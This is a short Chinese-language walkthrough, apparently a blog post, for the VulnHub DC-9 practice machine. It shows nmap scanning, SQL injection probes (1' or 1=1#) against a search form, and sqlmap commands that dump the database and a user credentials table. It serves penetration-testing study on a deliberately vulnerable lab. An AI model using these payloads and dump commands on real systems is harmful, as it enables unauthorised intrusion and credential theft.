前情提要
靶场地址:https://www.vulnhub.com/entry/dc-9,412/,DC-9是一个中级的靶场,需要具备以下前置知识:
- 基础的Linux命令及操作
- 基础的渗透测试工具使用(Kali / Parrot下的工具)
二珂说:DC系列的九个靶机就到此结束啦!!!后期会继续更新其他系列的靶机wp~感谢支持
信息收集
nmap -A -sV -p- -T4 192.168.132.156
目前发现只开放80端口,去web页面搜索一下
有一处后台登陆、一处搜索处
在搜索处1' or 1=1#
页面返回正常,1' or 1=2#
报错,BP抓包发现是POST
输出文件:sql进入kali一把梭
SQLMAP
sqlmap -r sql --dbs --dump
sqlmap -r sql -D users -T UserDetails -C id,username,password --dump